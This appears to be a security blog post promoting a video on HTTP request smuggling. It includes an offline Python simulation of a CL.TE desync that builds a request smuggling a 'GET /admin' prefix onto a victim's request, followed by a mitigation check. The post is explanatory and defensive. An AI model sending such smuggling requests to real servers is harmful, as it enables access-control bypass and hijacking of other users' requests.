HTTP Request Smuggling Explained: with seasoned bug bounty hunter NahamSec and world-class researcher James Kettle

Amelia Coen |
05 August 2025 at 11:08 UTC

Ever wondered how attackers can compromise modern websites by exploiting invisible cracks in HTTP infrastructure to win big bounties?

In his latest video, NahamSec walks through the basics of request smuggling with James Kettle, Director of Research at PortSwigger. Take a look as the pair dive deep into the world of HTTP Request Smuggling, a class of vulnerabilities that still haunts web stacks nearly two decades after it first surfaced.

What can I learn?

James breaks down how a front-end and a back-end server can disagree about where one HTTP request ends and the next begins, typically because they interpret the Content-Length and Transfer-Encoding headers differently, and how that disagreement lets an attacker's bytes sneak past security controls, hijack other users' sessions, poison caches, and in some cases compromise the whole system.
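The disagreement described above, as an added example that is not code from the video, NahamSec or PortSwigger: a CL.TE desync simulated in pure Python. The frame() function is a toy stand-in for an HTTP/1.1 server's body framing, where "cl" trusts Content-Length and "te" trusts Transfer-Encoding when both headers are present; the attacker and victim requests are constructed here and the host name vulnerable.example is hypothetical. The simulation also covers the two consistent pairings (both servers trusting the same header) to show that the desync only appears when the policies differ.

```python
# Added example, not code from the video, NahamSec or PortSwigger: a CL.TE
# request-smuggling desync simulated in pure Python. frame() stands in for an
# HTTP/1.1 server's body framing; "cl" trusts Content-Length and "te" trusts
# Transfer-Encoding when both headers are present. The requests are
# constructed here and the host name is hypothetical.

def parse_headers(head: bytes) -> dict[str, str]:
    """Map lower-cased header names to values for one request head."""
    headers: dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers


def chunked_body_end(rest: bytes) -> int:
    """Offset just past the terminating 0-chunk and its empty trailer block."""
    pos = 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return rest.index(b"\r\n", pos) + 2        # no trailers assumed
        pos += size + 2                                 # chunk data + CRLF


def frame(buf: bytes, prefer: str) -> tuple[bytes, bytes]:
    """Split one request off the front of buf -> (request, unconsumed bytes).
    prefer is "cl" or "te": the header this server trusts when both appear."""
    head, _, rest = buf.partition(b"\r\n\r\n")
    h = parse_headers(head)
    use_te = "transfer-encoding" in h and (prefer == "te" or "content-length" not in h)
    end = chunked_body_end(rest) if use_te else int(h.get("content-length", "0"))
    return head + b"\r\n\r\n" + rest[:end], rest[end:]


def request_line(req: bytes) -> bytes:
    return req.split(b"\r\n", 1)[0]


def build_cl_te_request(host: str, smuggled_prefix: bytes) -> bytes:
    """Attacker request: Content-Length covers the whole body, but the chunked
    framing ends after the 0-chunk, leaving smuggled_prefix unconsumed."""
    body = b"0\r\n\r\n" + smuggled_prefix
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n" + body
    )


def simulate(front: str, back: str, attacker: bytes, victim: bytes) -> list[bytes]:
    """Return the request lines the back-end sees for two client requests
    that the front-end forwards over one shared upstream connection."""
    forwarded, _ = frame(attacker, front)      # extra bytes stay on the attacker's connection
    first, lingering = frame(forwarded, back)  # back-end's view of the same bytes
    second, _ = frame(lingering + victim, back)  # leftover prefixes the victim's request
    return [request_line(first), request_line(second)]


def is_ambiguously_framed(raw: bytes) -> bool:
    """Hardening check a front-end can apply: refuse requests whose framing
    two servers could reasonably disagree on (both headers, or an odd TE)."""
    h = parse_headers(raw.partition(b"\r\n\r\n")[0])
    te = h.get("transfer-encoding")
    return te is not None and ("content-length" in h or te.lower() != "chunked")


# Constructed sample traffic (hypothetical host).
ATTACKER = build_cl_te_request("vulnerable.example",
                               b"GET /admin HTTP/1.1\r\nX-Ignore: ")
VICTIM = b"GET /home HTTP/1.1\r\nHost: vulnerable.example\r\n\r\n"

if __name__ == "__main__":
    print("CL.TE :", simulate("cl", "te", ATTACKER, VICTIM))  # victim's request becomes GET /admin
    print("TE.TE :", simulate("te", "te", ATTACKER, VICTIM))  # servers agree, no desync
    print("reject:", is_ambiguously_framed(ATTACKER))
```

In the CL.TE case the front-end forwards all 36 body bytes, the back-end stops after the 0-chunk, and the remaining `GET /admin HTTP/1.1\r\nX-Ignore: ` sits on the upstream connection until the victim's request arrives and is glued onto it, so the victim's request line is rewritten and their own request line is swallowed into a bogus header. With matching policies nothing lingers. The is_ambiguously_framed check is the simplest front-end mitigation: reject, rather than normalise, any request that carries both framing headers.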

The video also covers cutting-edge techniques involving HTTP/2 downgrades, browser-powered desync, and real-world case studies impacting major platforms like Netflix and Atlassian.

Whether you’re a pentester, developer, or AppSec pro, this is a must-watch to understand one of the web’s most underestimated risks.

Watch the video.

Ready to learn even more about HTTP request smuggling?

On 6 August at Black Hat USA, James Kettle will present new research on desync attacks under the title HTTP/1.1 Must Die.

Keep up to date with this new release, learn how lucrative this can be for a bug hunter, and join the movement over at http1mustdie.com.

Can I chat with other bug hunters getting started with request smuggling?

Absolutely! There’s a thriving community of testers, bug hunters, students, and AppSec professionals on the PortSwigger Discord.

Join the server today to get involved in the request smuggling conversation, share your progress, and celebrate your wins!
